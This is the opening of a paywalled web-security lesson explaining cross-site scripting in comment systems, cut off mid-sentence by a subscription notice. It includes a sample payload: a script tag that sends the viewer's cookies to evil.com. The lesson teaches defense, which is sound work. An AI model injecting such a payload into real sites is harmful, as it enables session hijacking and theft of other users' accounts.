Cross-Site Scripting (XSS) — When User Input Becomes Code
What XSS is, stored vs reflected attacks, sanitization, and React's built-in protection
If SQL injection is about user input becoming a database command, Cross-Site Scripting (XSS) is about user input becoming executable code in someone else's browser.
It's the most common web vulnerability, and it affects any app that displays user-generated content — which is most apps.
How XSS Works
The core problem: your app takes input from one user and displays it to another user. If that input contains JavaScript and your app renders it without sanitizing it, the JavaScript runs in the other user's browser.
Example: A comment system.
User A posts a comment:
Great article! <script>document.location='https://evil.com/steal?cookie='+document.cookie</script>If your app renders this comment as raw HTML, every user who views the page runs that script. The script s
This lesson is part of the Guild Member curriculum. Plans start at $29/mo.